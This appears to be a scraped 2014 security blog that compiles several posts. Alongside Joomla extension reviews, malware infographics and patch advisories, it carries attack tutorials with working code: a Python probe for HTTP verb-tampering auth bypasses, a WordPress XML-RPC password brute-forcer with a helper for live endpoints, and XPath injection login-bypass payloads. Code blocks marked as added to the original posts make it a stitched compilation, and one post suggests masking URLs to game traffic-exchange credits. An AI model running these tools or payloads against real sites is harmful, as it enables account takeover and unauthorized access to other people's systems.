
5 Best Joomla Security Extensions For You to Breathe Easy






After WordPress and Drupal, Joomla is one of the most popular content management systems in the world, powering websites of all sorts and sizes. Like any other open-source CMS, Joomla-powered sites have to deal with attacks. Almost every day Joomla sites are hit by attackers who deface pages, upload backdoors, and steal or delete sensitive information, and most of these attacks cost site owners a substantial amount of time and money to clean up. Site owners should therefore take every reasonable measure to strengthen the security of their Joomla installation.

In this post we list some remarkably useful extensions that help secure a Joomla website.



jHackGuard
jHackGuard is an extension from SiteGround that helps protect Joomla sites from being hacked. It is available to all Joomla site owners, whether or not they host with SiteGround. It consists of a system plugin (which does the actual work) and a component (which handles configuration), and protects the site by filtering user input and applying additional PHP security settings. The filters are disabled for authenticated administrators so that they do not interfere with administrative tasks; the flip side is that the protection does not apply to requests made with a stolen administrator session, so keep the admin accounts themselves well protected.


jHackGuard is compatible with Joomla 3 and later. If your site still runs an older version, download the matching release, such as jHackGuard for Joomla 1.5.







Akeeba Backup
Akeeba Backup, formerly known as JoomlaPack, is a free, open-source backup component that creates a full site backup which can be restored on any server capable of running Joomla. It packs the whole site into a single archive containing all the files, a database snapshot and an installer.
The best aspect of this extension is its AJAX-driven backup and restore process, which avoids server timeouts even on large sites. You can also choose to back up only the files or only the database. It is compatible with Joomla 2.5 and 3.x only. Because the archive contains configuration.php (with the database credentials) and a full database dump, treat it as sensitive: keep it out of the web root and copy it off the server.






 

HTTP Verb Tampering Demo/Example/Tutorial



What is an HTTP verb?

  • According to Wikipedia, "The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. HTTP is the foundation of data communication for the World Wide Web."

  • A verb is simply an HTTP method: it indicates the action to be performed on the identified resource.


-  Some basic HTTP verbs (methods)
  • OPTIONS
  • GET
  • HEAD
  • POST 
  • PUT
  • DELETE
  • TRACE
  • CONNECT



What is HTTP Verb Tampering? 

It is a way to bypass an access control by changing the HTTP verb of the request. Directories protected with HTTP Basic authentication in an Apache .htaccess file are a common case: if the authentication directive is wrapped in a <Limit> block, only the methods listed there are authenticated. The attack is therefore the result of an .htaccess misconfiguration, not of a flaw in Basic authentication itself.

In the example below the administrator requires credentials only for the GET and POST methods. See the vulnerable configuration below.

Here AuthUserFile points to the .htpasswd file, which holds the usernames and their hashed passwords.

<LIMIT GET POST>
require valid-user
</LIMIT>


This only requires a valid user for GET and POST requests; the supplied credentials are checked against the .htpasswd file, and a wrong pair gets the 401 error page.


So the administrator has restricted GET and POST, but has not restricted any other method. Any request using another verb reaches the protected resource without credentials: HEAD does not help, because <Limit GET> also covers HEAD, but PUT, DELETE, OPTIONS, TRACE or even a made-up method name is not covered. Whether content actually comes back then depends on the handler; a PHP script typically executes for any method, whereas Apache's core handler serves static files only for GET, HEAD and POST. Below is a video demo of successfully exploiting an HTTP verb tampering vulnerability with Live HTTP Headers (a Firefox add-on) on an AT&T subdomain (reported and fixed). In the next post I will show various ways to fix this vulnerability.
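To make the bypass concrete, here is an added example in Python (not part of the original post): a throwaway local HTTP server that mimics the .htaccess above, authenticating only GET and POST (with HEAD folded into GET, as Apache does), and a probe that sends each verb without credentials and reports which ones get through. The protected path, the loopback port and the admin/s3cret credential are assumptions made for the demo.

```python
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

PROTECTED_PATH = "/admin/"                      # assumed protected directory
LIMITED_VERBS = {"GET", "POST"}                 # what <Limit GET POST> covers
PROBE_VERBS = ["GET", "HEAD", "POST", "OPTIONS", "PUT", "DELETE", "TRACE", "FOO"]
# Constructed credential for the demo server: admin / s3cret
VALID_AUTH = "Basic " + base64.b64encode(b"admin:s3cret").decode()


class MisconfiguredHandler(BaseHTTPRequestHandler):
    """Mimics the .htaccess above: Basic auth is enforced only for GET and POST."""

    def _serve(self):
        # Apache treats HEAD as GET inside <Limit>, so fold it in the same way.
        verb = "GET" if self.command == "HEAD" else self.command
        if (self.path.startswith(PROTECTED_PATH) and verb in LIMITED_VERBS
                and self.headers.get("Authorization") != VALID_AUTH):
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="Secret"')
            self.end_headers()
            return
        body = b"secret admin page\n"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if self.command != "HEAD":
            self.wfile.write(body)

    # Every verb, including the made-up FOO, is routed to the same handler.
    do_GET = do_HEAD = do_POST = do_OPTIONS = do_PUT = do_DELETE = do_TRACE = do_FOO = _serve

    def log_message(self, *args):               # keep the demo quiet
        pass


def probe(host, port, path, verbs=PROBE_VERBS):
    """Send each verb without credentials and record the status code per verb."""
    results = {}
    for verb in verbs:
        conn = http.client.HTTPConnection(host, port, timeout=5)
        conn.request(verb, path)
        resp = conn.getresponse()
        resp.read()
        results[verb] = resp.status
        conn.close()
    return results


def bypass_verbs(results):
    """Verbs that returned 2xx although GET was refused: evidence of verb tampering."""
    if results.get("GET") not in (401, 403):
        return []
    return [verb for verb, status in results.items() if 200 <= status < 300]


def demo():
    """Start the misconfigured server on a random loopback port, probe it, shut it down."""
    server = HTTPServer(("127.0.0.1", 0), MisconfiguredHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        results = probe("127.0.0.1", server.server_port, PROTECTED_PATH)
    finally:
        server.shutdown()
        server.server_close()
    return results, bypass_verbs(results)


if __name__ == "__main__":
    statuses, bypasses = demo()
    for verb, status in statuses.items():
        print(f"{verb:8} -> {status}")
    print("unauthenticated access via:", ", ".join(bypasses))
```

Against a real site, point probe() at the host and protected path and look for the same pattern: 401 on GET, HEAD and POST but 200 on anything else. The fix the demo server lacks is equally simple: put Require valid-user outside any <Limit> block so that every method is authenticated.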



 







 

Best Traffic Exchange service website | Hitleap



There's a huge demand for traffic exchange websites, and you can find any number of sites on the internet offering the service. After trying many of them I came to the conclusion that Hitleap is one of the best in terms of service, monetary profit and website performance. It works by earning minutes while you surf other members' sites in the Hitleap viewer software, and then spending those minutes on traffic to your own site. Earning minutes is easy: open the viewer and let it run. The minutes you have determine how much traffic your submitted URL gets. Submitted sites are approved by their moderators within seconds, and you can set how many seconds or minutes a visitor should stay on your page.

Earning via HitLeap

- Some websites give credits just for visiting a URL; you can mask such a URL, submit it to Hitleap, and sit back and earn. (I will cover this in a later tutorial.)

- Referrals: 10% of the minutes your referrals earn and 20% of the cash value of any purchase they make.


 

Mobile security infestation [Infographics]

The explosion in popularity of mobile devices has changed the way people go about their daily lives. Their reliance on the efficiency and speed of these gadgets has often made location irrelevant. With that reliance comes risk: the number of malware strains and attackers hunting for unencrypted data has risen dramatically over the past few years, closely tracking the rise in smartphone and tablet usage over the same period.


This infographic, provided by TollFreeForwarding.com, is an interesting look at mobile security, how it is being exploited, and the future of safe usage on mobile devices.

 Russel Cooke is a journalist based in Louisville, KY. His love of technology often drives his stories, which also center around social media, content creation, and marketing. You can follow him on Twitter @RusselCooke2.



 

Wordpress XML-RPC Brute Force Attack Vulnerability

Today I'll be sharing an easy and quite interesting tutorial on the WordPress XML-RPC brute force attack.
As we all know, when an attacker gets hold of a WordPress website, the first thing he tries in order to compromise it is a brute force attack: he loads a list of username and password combinations and tries them until one works. From a newbie attacker's point of view it is always the first and mandatory thing to try. Because brute force attacks increase day by day, developers have started using login captcha plugins to protect the login form against them.


XML-RPC is a WordPress interface, and it has been enabled by default since WordPress 3.5. Recently very critical vulnerabilities have been found in it that affected a large part of the web, such as the pingback DDoS vulnerability and arbitrary code execution. It has also come to light that attackers are abusing the XML-RPC wp.getUsersBlogs method to launch brute force attacks against sites: many XML-RPC calls require credentials, so an attacker can try username and password combinations through them, and the response says whether the pair is valid or not. A captcha plugin on the login form never sees these requests, so it does not help against them.



Step by step guide -



 - Locate the XML-RPC endpoint on the target site, e.g. localhost/xmlrpc.php
- Send a POST request to it with the following body.

<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
    <param><value><string>user</string></value></param>
    <param><value><string>password</string></value></param>
  </params>
</methodCall>

- Check the response.

If the combination is wrong, the reply is a fault containing a faultCode.

If it is right, the reply lists the user's blogs, each with an isAdmin flag among other fields.
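The whole procedure, as an added Python example that is not from the original post: it builds the wp.getUsersBlogs request above with the standard library's xmlrpc.client, classifies the reply by faultCode versus the isAdmin flag, and loops a wordlist through it. Because there is no live target here, the requests go to fake_wordpress, a constructed stand-in for xmlrpc.php that answers the way the post describes; the credential, the fault message and the blog details it returns are made up. http_sender shows how the same loop would be pointed at a real endpoint.

```python
import urllib.request
import xmlrpc.client


def build_request(username, password):
    """The wp.getUsersBlogs call from the post, serialised as XML-RPC."""
    return xmlrpc.client.dumps((username, password), methodname="wp.getUsersBlogs")


def classify(response_xml):
    """Map the reply to ('invalid', faultCode) or ('valid', isAdmin)."""
    try:
        (blogs,), _ = xmlrpc.client.loads(response_xml)
    except xmlrpc.client.Fault as fault:          # bad credentials come back as a fault
        return ("invalid", fault.faultCode)
    return ("valid", bool(blogs and blogs[0].get("isAdmin")))


def http_sender(url):
    """Return send(xml) that POSTs to a live xmlrpc.php; not used by the offline demo."""
    def send(xml):
        req = urllib.request.Request(url, data=xml.encode(),
                                     headers={"Content-Type": "text/xml"})
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode()
    return send


VALID = ("admin", "Summer2014")   # constructed credential known only to the fake server


def fake_wordpress(request_xml):
    """Offline stand-in for xmlrpc.php: fault 403 on bad credentials, a blog list on good ones."""
    params, method = xmlrpc.client.loads(request_xml)
    if method != "wp.getUsersBlogs":
        return xmlrpc.client.dumps(xmlrpc.client.Fault(-32601, "requested method not found"))
    if tuple(params) != VALID:
        return xmlrpc.client.dumps(xmlrpc.client.Fault(403, "Incorrect username or password."))
    blogs = [{"isAdmin": True, "url": "http://localhost/", "blogid": "1",
              "blogName": "Demo", "xmlrpc": "http://localhost/xmlrpc.php"}]
    return xmlrpc.client.dumps((blogs,), methodresponse=True)


def brute_force(send, username, wordlist):
    """Try each password through wp.getUsersBlogs; return (password, isAdmin) of the first hit."""
    for password in wordlist:
        status, detail = classify(send(build_request(username, password)))
        if status == "valid":
            return password, detail
    return None


if __name__ == "__main__":
    print(brute_force(fake_wordpress, "admin", ["password", "123456", "Summer2014"]))
```

Any reply that is not a fault means the pair was accepted, so the loop stops there; isAdmin only tells you whether that account has administrator rights on the blog. To run the same loop against a real endpoint, pass http_sender("http://target/xmlrpc.php") instead of fake_wordpress.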









Hope you all liked this tutorial. Any queries? Drop them in the comments!


 

Malware: How we are Infected [InfoGraphic]

So you have a computer, but if it were infected with a virus, what would you do? Would you even know it was there? The infographic states that over 32% of all computers in the world carry malware of some sort. Today we will be talking about the infamous computer virus and what it is.

Let's start with something you have all probably heard of: malware. Malware is a program made to infiltrate your computer, disable parts of it, and gain access to your hard drive, search history and so on to help steal information. There are several types of malware; let's get to know them and how much of that 32% each accounts for.

At 57%, first we have the virus: software that can copy itself into other files and folders. Then there is the Trojan at 21%, malicious software that is distributed on the internet disguised as a legitimate program or free item; once you download it, you soon discover it is malicious. The Trojan has a brother at 7%, the Trojan downloader, which does the same thing as the simple Trojan but, once on your computer, downloads further malware and then runs it.

At 3% there is the exploit, which uses a bug or system error to break into your computer. Next we have the worm at 2%; unlike a Trojan it needs no user action, spreading by copying itself across your network.

Not all infections look harmful at first, for instance adware at 3%: nothing happens until you open your web browser, and then your screen is flooded with ads. There is also the monitoring tool, 2% of the infected 32%: it hides, does nothing but monitor your activity (search history, keystrokes and so on), and sends it to a remote server.

One of the worst, at 1%, is the backdoor: it gives the attacker remote access to your computer while trying to stay hidden from your antivirus. And lastly, one of the worst but luckily at a low 0.01%, spyware: diabolically designed software that takes the most important pieces of information it can find, generally passwords, credit card numbers and other sensitive data, and sends them back to wherever it came from.
All of these have devastating effects. Last year 27 million strains of malware were made, which means about 74,000 new samples every day. 24 million homes in the United States experience spam. 16 million homes had serious virus infections in the last 2 years, and 6 million had spyware in the last 6 months. Most devastating of all, over 1 million homes lost money to spyware in the last year, and viruses cost the world 4.55 billion USD every year.

So be safe, don't download anything you are unsure of, and be sure to run antivirus software. Most importantly, learn how to detect these programs when you get them.

 

Follow these steps to make a Facebook page with no name:

    1) First, create a new Facebook page.

    2) Select a category, for example Entertainment, and then choose a sub-category.

    3) Copy the characters inside the brackets [ ᠌᠌᠌᠌᠌] (they are invisible Unicode characters, which is why the field looks empty) and paste them into the name field.

    4) Click "I agree to Facebook Pages Terms" and then "Get Started". A page with no name is created.


 

iOS Update Quashes Dangerous SSL Bug


Photo by: Duncan Hull


If you haven't installed the iOS 7.0.6 update, stop what you're doing and get it now. It fixes a dangerous SSL bug that can hurt you in numerous ways until you update. Even if you have an older device, make sure it runs the latest OS available for it.


Back in February of this year it came out that, without the update, an attacker on the network could read and modify encrypted communications from iPhones, iPads and other iOS devices. As you might imagine, this upset a lot of people. The good news is that Apple was pretty quick to make an update available; the catch is that it only helps the people who install it.


And that's part of the problem: not everyone updates their operating system on their own, especially on a phone or tablet. Some people have claimed it wasn't a flaw at all but was built into iOS to let someone, the NSA perhaps, spy on people more easily. Apple denied the claims, of course, but if you Google around you will find some interesting speculation about the "flaw".


According to Ars Technica, the problem went beyond iOS mobile devices and also affected Mac OS X users, even with all current patches installed at the time: "[The] vulnerability has been confirmed in iOS versions 6.1.5, 7.0.4, and 7.0.5, and OS X 10.9.0 and 10.9.1." That's quite a wide exposure. And while Apple moved fast to squash the bug last month, there's a good chance that a lot of people still haven't patched.


To stay safe, here are some specific tips.


  • Always update - The first thing you want to do is make sure you ALWAYS update your OS when a new version is available.
  • Be aware - To know when you should update, keep up with the major problems that have been found.
  • Act quickly - The sooner you install the patch, the sooner you're safe from attacks on that flaw.


There's no guarantee your mobile devices will be safe and secure, but take whatever steps you can to be as safe as possible. If you have any thoughts about the latest iOS update and the major security flaws it killed, leave a comment below and let us know.


Guest Post:

Written by Jenny Corteza, who has used a City Directory Theme because it made her life as a writer a whole lot easier. She has been writing technology articles for many years.
 

WhatsApp spam used by ASProx Botnet to Deliver Kuluoz Malware


Photo by: Sean MacEntee




As you probably know, Facebook bought WhatsApp for an obscene amount of money and stock earlier this year. What you might not know is that a lot of WhatsApp-themed spam is being used by the Asprox botnet to deliver the nasty Kuluoz malware to unsuspecting users. This is not good news any way you look at it. Keep reading if you want to know more, and what you should do to stay safe.


Here are some of the dates on which the WhatsApp spam made Malcovery's "Today's Top Threats" list.


  • September 19, 23, 24, 25, 26
  • October 2, 3, 4, 7, 8, 9, 10, 11, 16, 17, 18, 21, 22, 23, 24, 25
  • November 14
  • January 9, 13, 15, 20, 28


Looking at that list, it's easy to wonder why nothing was done about the problem sooner. It also makes you wonder why Facebook paid so much for the company, largely in stock.


Going back to November of last year, ComputerWorld published an article naming WhatsApp as one of the top five brands imitated in spam that delivers malware. That's quite a bit of recognition, and not in a good way. Note that the emails only imitate the brand; WhatsApp itself is not sending them.


Here are some specific ways to stay safe and avoid Kuluoz and other malware.

  • Use Protection - The very first thing to do is make sure you're running some kind of protection. The good news is that you don't need to spend a lot of money to get decent antivirus software these days.
  • Update Protection - Having protection software is nice, but if you never update it, there's still a high chance your computer will get infected and stop working correctly.
  • Be Suspicious - If you're not sure about something online, err on the side of caution and don't take unnecessary risks. Even with a brand like WhatsApp, now connected to Facebook, be careful and know what you're doing before you click.
  • Educate Yourself - Last but certainly not least, make an effort to stay informed about how malware works and the steps you can take to protect yourself from it. This is the best way to keep your computer safe and virus free.


Following the advice above, there's a good chance you'll avoid WhatsApp spam and not get infected with Kuluoz. Still, keep paying attention and keep your antivirus software up to date. If you have had a negative experience with WhatsApp spam, please leave us a comment below.







Guest Post - 
 
Written by Jenny Corteza, who deals with staff outsourcing all the time. She's a writer, and dealing with editors and others can sometimes be a problem. Still, she loves writing articles about technology. Go figure.





 

What is xPath Injection? How to exploit with xPath? [Part 1]

XPath injection occurs when user-supplied input is not properly sanitized and an attacker is able to construct a malformed XPath query against XML data with the intention of extracting sensitive information that normal users cannot access. It is similar to SQL injection: in SQL injection the attacker manipulates SQL queries, in XPath injection the attacker manipulates XPath queries over XML data. XML is queried through XPath, a simple descriptive expression language that lets a query locate particular information in a document.

To see what such an XML document looks like, have a look below. It is a simple XML document used to authenticate a user based on the username and password combination they enter.


<users>
<user>
<name>Administrator</name>
<username>hackingsec</username>
<password>password123!</password>
<admin>1</admin>
</user>
<user>
<name>Admin</name>
<username>admin</username>
<password>reddit12</password>
<admin>0</admin>
</user>
</users>
















When the username 'admin' and password 'reddit12' are entered, the following XPath query is executed

/users/user[username="admin" and password="reddit12"]

which would return the following:

<user>
<name>Admin</name>
<username>admin</username>
<password>reddit12</password>
<admin>0</admin>
</user>


Exploiting XPath Injection: Authentication Bypass

A malicious user can bypass the authentication by submitting specially crafted input. The query the application builds is:

/users/user[username="admin" and password="reddit12"]

If an attacker submits the following malicious input:

username: admin" or "1"="1
password: anything

the XPath query that gets executed becomes:

/users/user[username="admin" or "1"="1" and password="anything"]

This query results in an authentication bypass: the attacker can log in to the application as the user "admin". The injected OR makes the predicate true for that user regardless of the password. In XPath (as in SQL) AND has higher precedence than OR, so the predicate is evaluated as shown by the following pseudo-code:

username="admin" or [TRUE and FALSE]
which reduces to:
username="admin" or FALSE

As the username admin exists, the attacker is logged in as that user. The password is never really checked. Nor does the attacker need to know a username: submitting " or "1"="1 in both fields makes the predicate true for every user, so the first user in the file, here the Administrator, is returned.
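To show exactly how the injected quotes change the query's evaluation, here is an added Python example, not from the original post. The standard library's ElementTree does not evaluate and/or predicates, so the block includes a toy evaluator for the /users/user[...] predicate that implements XPath's precedence (and binds tighter than or); it is a stand-in for a real XPath engine, and the SAFE allow-list in login_hardened is an assumed mitigation. The XML is the document shown above.

```python
import re
import xml.etree.ElementTree as ET

# Constructed copy of the users document from the post.
USERS_XML = """<users>
<user><name>Administrator</name><username>hackingsec</username><password>password123!</password><admin>1</admin></user>
<user><name>Admin</name><username>admin</username><password>reddit12</password><admin>0</admin></user>
</users>"""

def build_query(username, password):
    """Vulnerable: both inputs are pasted straight into the XPath predicate."""
    return '/users/user[username="%s" and password="%s"]' % (username, password)

# Toy evaluator for the predicate: string literals, child names, '=', 'and', 'or'.
TOKEN = re.compile(r'\s*(?:"([^"]*)"|(and|or)\b|([A-Za-z_][\w-]*)|(=))')

def tokenize(pred):
    out, pos, pred = [], 0, pred.strip()
    while pos < len(pred):
        m = TOKEN.match(pred, pos)
        if not m:
            raise ValueError("unsupported predicate at offset %d" % pos)
        string, keyword, name, _ = m.groups()
        if string is not None:
            out.append(("str", string))
        else:
            out.append(("kw", keyword) if keyword else ("name", name) if name else ("eq", "="))
        pos = m.end()
    return out

class Predicate:
    """Recursive descent with XPath precedence: 'and' binds tighter than 'or'."""
    def __init__(self, tokens, node):
        self.tokens, self.pos, self.node = tokens, 0, node
    def peek(self):
        return self.tokens[self.pos] if self.pos < len(self.tokens) else None
    def take(self):
        tok = self.peek()
        if tok is None:
            raise ValueError("unexpected end of predicate")
        self.pos += 1
        return tok
    def or_expr(self):            # and_expr ('or' and_expr)*
        value = self.and_expr()
        while self.peek() == ("kw", "or"):
            self.take()
            rhs = self.and_expr()  # always evaluated so its tokens are consumed
            value = value or rhs
        return value
    def and_expr(self):           # comparison ('and' comparison)*
        value = self.comparison()
        while self.peek() == ("kw", "and"):
            self.take()
            rhs = self.comparison()
            value = value and rhs
        return value
    def comparison(self):         # operand '=' operand
        left = self.operand()
        if self.take()[0] != "eq":
            raise ValueError("expected '='")
        return left == self.operand()
    def operand(self):
        kind, value = self.take()
        if kind == "str":
            return value
        if kind == "name":        # child element text, as in username="..."
            return self.node.findtext(value)
        raise ValueError("unexpected token %r" % value)

def run_query(xpath):
    """Evaluate /users/user[<predicate>] against USERS_XML; returns matching <user> elements."""
    m = re.fullmatch(r"/users/user\[(.*)\]", xpath, re.S)
    if not m:
        raise ValueError("this toy engine only understands /users/user[...]")
    tokens, hits = tokenize(m.group(1)), []
    for user in ET.fromstring(USERS_XML).findall("user"):
        pred = Predicate(tokens, user)
        matched = pred.or_expr()
        if pred.pos != len(tokens):
            raise ValueError("trailing tokens in predicate")
        if matched:
            hits.append(user)
    return hits

def login(username, password):
    """Name of the first user the (injectable) query matches, or None."""
    hits = run_query(build_query(username, password))
    return hits[0].findtext("name") if hits else None

SAFE = re.compile(r"[A-Za-z0-9_.@!-]+")   # assumed allow-list: no quotes, spaces or operators

def login_hardened(username, password):
    """XPath 1.0 has no bound parameters, so validate before input reaches the query."""
    if not (SAFE.fullmatch(username) and SAFE.fullmatch(password)):
        return None
    return login(username, password)
```

login('admin" or "1"="1', "anything") returns "Admin" even though the password is wrong, and login('" or "1"="1', '" or "1"="1') returns "Administrator" without knowing any username; login_hardened rejects both inputs before they reach the query.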


That was a basic introduction to what XPath is and how to exploit it. I will be dividing this topic into 3 separate parts. This was the 1st part; in the 2nd part I will explain how to extract data through XPath injection, and in the 3rd part we will look at some automated tools for exploiting XPath injection.
 
 
Copyright © 2014. Hacking-Sec - All Rights Reserved
